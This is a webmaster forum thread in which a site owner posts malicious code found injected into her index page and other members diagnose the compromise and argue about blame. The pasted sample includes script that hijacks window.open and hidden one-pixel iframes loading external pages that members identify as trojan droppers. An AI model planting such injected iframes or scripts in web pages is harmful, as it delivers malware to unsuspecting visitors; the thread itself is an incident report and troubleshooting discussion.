Hackers?

[SaucyPanties]

One of our sites www.sexliveporn.com has some code which is trying to load. I have reported it to the host but has anyone else had any experience of this? The following code is not ours... Edit Removed some quote marks in case I cause a problem here...

script language="JavaScript"
<!--

function SymError()
{
return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
return (new Object());
}

window.open = SymWinOpen;

//-->
/script

script language="JavaScript"> OW=window.open("http://abdkmfgij.wheezeruffled.com/e/?cehlfgijxoooqyabdkmzcv","OWP", "toolbar=1,location=1,status=1,menubar=1,scrollbars=2,resizable=1")</script>
<iframe src='http://prevedtraf.biz/adv/167/new.php' width=1 height=1></iframe>
<iframe src='http://prevedtraf.biz/adv/new.php?adv=167' width=1 height=1></iframe>
<iframe src="http://yaxmtxhfen.biz/dl/adv407.php" width=1 height=1></iframe
</body>

</html>


<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
window.open = SymWinOpen;
if(SymRealOnUnload != null)
SymRealOnUnload();
}

function SymOnLoad()
{
if(SymRealOnLoad != null)
SymRealOnLoad();
window.open = SymRealWinOpen;
SymRealOnUnload = window.onunload;
window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
/script

Mod edit, unlinked URL in this post

[Useless]

A site:prevedtraf.biz search in Google says it all. This site may harm your computer.

Your site has an exploit and it's definatley an issue for your host to handle. It may even be a server-wide issue.

[Chimera]

Your site is currently attempting to load what my virus scanner defines as a trojan I had to alt f4 and do a complete scan after viewing that page.

[SaucyPanties]

Okay thanks, I had already fired a message off to the host. Will wait to see what they say, I was thinking of moving this site so maybe now is a good time.

[Cleo]

|goodidea Just for the fuck of it I went to the page using Safari on a Mac… After my browser put up a dialog saying it didn't have the correct plugin to run the script it crashed my browser.

[MrYum]

Yup, sure looks like your server has been compromised somehow

Fuckin assholes

[Cleo]

all your base belong to us

[Licker4U]

I had a similar problem two days ago. Somehow while working on the index page for my hub, I uploaded what my server tech called "malicious html". Norton Anti Virus never made a peep. They told me about AVG Anti Virus (free) and it found it on my computer and deleted it. It was a Trojan downloader. I deleted the index page from my server and uploaded the clean version. My password for FTP access didn't work so the host re-set it for me. You might need to delete the file in question and re-upload a "clean" file. That might be the fastest and simplest solution.

[SaucyPanties]

Just read on another forum a few others having or had this problem. Now it does uses cams.com iframes on an inner page, I have read before Iframes cause hack problems. What do I do, wait for the host to look into it or re-upload the index?

[Useless]

If the server has been exploited, you can keep uploading your pages all day long and it won't matter. That thing will creep back onto your site. The most important thing right now if for the host to figure our how they got in, seal up the hole - then repair the damage.

[cd34]

that exploit is typically installed through FTP rather than a server exploit. I would change your password, have your host find out what IP address modified the files (there will be a GET followed by a PUT), then find all of the files that the IP address modified. Typically, they will only modify domains in the root of each domain name, and usually only index.html and index.php

[T Pat]

colo-cation.com (cd34) is why I sleep so well at night.

[Jim]

Quote:

Originally Posted by T Pat

colo-cation.com (cd34) is why I sleep so well at night.

Amen Pat
I have always said, when you own and host firewall.com, you are asking to be attacked. And so far as long as I have known him (1996)...nothing.

[twintone]

People need to chill on immediately blaming your host. A host can not prevent someone from logging into your FTP account when they have the valid username and password! If you find this code on one of your sites, the first thing you need to do is change your password.

The problem is not with your host. Albeit possible that you have an exploit in a script, and they are dumping the code in that way. You still can't blame your host for that.

The far better chance is you have a Trojan key logger on your PC or PCs that you use to access your FTP account.

The key logger dumps your key strokes to an ICQ channel, and they have a bot that filters out the info they want. They then embed their code in your index files in attempt to infect more people.

Why do they do this? To feed their botnet. This is just a massive botnet ring. The code that is in your html will actually infect you and surfers with 2 Trojans. One to key log all your info, and another is a backdoor to control your PC. So you too can be part of their massive botnet.

I bet you anything if you SSH into your machine, and do a last | grep [username] you will see a login from an IP that is not yours.

Download this AVS http://www.avast.com/eng/download-avast-home.html (it is free) and scan your machine in "safe mode". You will find you have a Trojan that your current AVS is not picking up.

Just on a side note. Norton AV is the biggest piece of shit on the planet, and WILL NOT find this Trojan. I would suggest getting rid of Norton immediately. It is truly garbage. http://en.wikipedia.org/wiki/Norton...irus#Criticisms

We are 100% confident from our research, and running a honeypot for a few months that Avast WILL find this Trojan. I am sure there is other AVS that will, but we know for sure Avast will, and Norton will NOT.

Good luck with it. It has been something we have seen, and have been investigating since Sep 2006.

[Useless]

Quote:

Originally Posted by twintone

People need to chill on immediately blaming your host.

Chill Winston!
No one is putting blame upon the host, merely stating that the host is the one who is going to typically figure the mess out. (And the one time I had that type of thing pop up on my sites, it was the virtual server I hosted on that had an Apache exploit.)

If you think we're a bunch of dummies, I'll point you toward the mainstream board I'm hanging at. GoDaddy All the Way! with that crowd.

[Wazdom]

thanks twintone been looking for new anti-virus

[twintone]

Quote:

Originally Posted by Useless Warrior

Chill Winston!
No one is putting blame upon the host, merely stating that the host is the one who is going to typically figure the mess out. (And the one time I had that type of thing pop up on my sites, it was the virtual server I hosted on that had an Apache exploit.)

If you think we're a bunch of dummies, I'll point you toward the mainstream board I'm hanging at. GoDaddy All the Way! with that crowd.

Quote:

Originally Posted by Useless Warrior

Your site has an exploit and it's definatley an issue for your host to handle. It may even be a server-wide issue.

To me, that sounds like putting the responsibility on the host.

[SaucyPanties]

The host asked if I had any scripts running, I said not to my knowledge apart from natemail if you call that a script. The host asked if I had any cgi programs installed, I said no. The host said they cannot see anyone logging in over the past several days including myself and then started to ask more questions about the site, I politely invited them to visit my files and take a look around... I think it is time to change hosts... It could be me but I highly doubt it, I am a very small fish and have lots of antivirus in place. I uploaded the index page 20 days ago, it was fine 4 days ago, sometime over the last 3-4 days it got hacked. Considering my last connection to FTP was 20 days ago I have to believe it is the host... My host seems very laid back about it, considering their could be a security issue you would think they would look a little deeper.. I am signing up with Cyberwurx as they have offered to double any bandwidth...

[twintone]

Quote:

Originally Posted by SaucyPanties

The host asked if I had any scripts running, I said not to my knowledge apart from natemail if you call that a script. The host asked if I had any cgi programs installed, I said no. The host said they cannot see anyone logging in over the past several days including myself and then started to ask more questions about the site, I politely invited them to visit my files and take a look around... I think it is time to change hosts... It could be me but I highly doubt it, I am a very small fish and have lots of antivirus in place. I uploaded the index page 20 days ago, it was fine 4 days ago, sometime over the last 3-4 days it got hacked. Considering my last connection to FTP was 20 days ago I have to believe it is the host... My host seems very laid back about it, considering their could be a security issue you would think they would look a little deeper.. I am signing up with Cyberwurx as they have offered to double any bandwidth...

In your case it very well may be the host. I know Servage is extremely unsecure with their FTP setup. Logging into FTP you are able to go up a directory and view files of other users on that machine. I don't know if it is possible to write to files, but if for some reason you could, these guys could infect ever index file on a virtual server in a hurry. Pretty scary.

[Useless]

Quote:

Originally Posted by twintone

To me, that sounds like putting the responsibility on the host.

I said "Your site has an exploit and it's definatley an issue for your host to handle. It may even be a server-wide issue." That statement doesn't place the blame anywhere. Expecting the assistance of one's host when dealing with an exploit shouldn't be a GREAT BIG FUCKING SHOCK!!!

Quote:

Originally Posted by twintone

In your case it very well may be the host. I know Servage is extremely unsecure with their FTP setup. Logging into FTP you are able to go up a directory and view files of other users on that machine.

That, my friend, is blaming the host.

[twintone]

Right, you are making a statement like it is a FACT! "Your site has an exploit and it's definitely an issue for your host to handle." How the hell do you know it is an exploit? You are most likely leading people down the wrong path for a resolution to the problem. Again, it is possible it is an exploit in a script, but chances are about 99% it is a Trojan on their PC.

A Trojan on a PC that logs your key strokes isn't an exploit. I see people on every board freaking out on their host that they suck because their site is getting hacked. The chances of a system wide exploit that is the full responsibility of the host are close to zero.

No one is saying that a host can't get involved and help with this type of thing. My problem is with people crying that their host sucks, when in fact they have a Trojan stealing their password. I have helped at least 20 people with this issue, and every one of them has had this Trojan on their PC. Once they got rid of the Trojan, the problem stopped.

And as far as Servage goes. By having FTP setup the way they do is not secure, and yes they need to take blame for that. However, people should be protecting their PC's and not having their user / pass being keylogged in the first place. Most hosts aren't as dumb as Servage, and have their system setup that way.

I try to make a helpful post, and be somewhat to the point about it, and you turn it into a pissing match. I don't have time to waste on someone who really doesn't know what they are talking about, turn something useful into a fight.

[Wazdom]

twintone I think your right on the money, user not server

servage had my eyes like saucers when I read "WebDrive (S" that has to be like a valintine card for hackers LOL .. but this thread has nothing to do with servage, the site in question isn't hosted there .. it is, however, a valid example of weak technical management

[Useless]

Quote:

Originally Posted by twintone

Right, you are making a statement like it is a FACT! "Your site has an exploit and it's definitely an issue for your host to handle." How the hell do you know it is an exploit? You are most likely leading people down the wrong path for a resolution to the problem. Again, it is possible it is an exploit in a script, but chances are about 99% it is a Trojan on their PC.

You know, Chop said a lot of good things about you, but that doesn't count for shit after your performance in this thread. Fine, you as a host don't want to assist your customers with this type thing. Go ahead and tell them they're on their own. Good for you. Her site has an exploit - she doesn't know what to do. What should my advice be? "Too bad, it's your fault, you're fucked now." I guess I'm right out of my fucking mind to tell someone to speak to their host when their site has so obviously been eploited.

I'm giving advice based on my experience with a very similar matter. I had to leave host due a server-wide exploit creating very similiar conditions. I've been there!

Never did I blame the host - or hosts in general. You can either chill out or go fuck yourself. Don't try to twist my words. You keep this shit up and it's only going to result in name-calling, you pathetic excuse for a sig whore.

[Useless]

Quote:

Originally Posted by Wazdom

twintone I think your right on the money, user not server

Whether or not it's the user's fault that her site has been exploited is another matter. Who's going to advise her best on how to deal with the issue? The fucking host!

[oldbrad]

saucy, i use cyberwurx and am very happy with them and their customer support.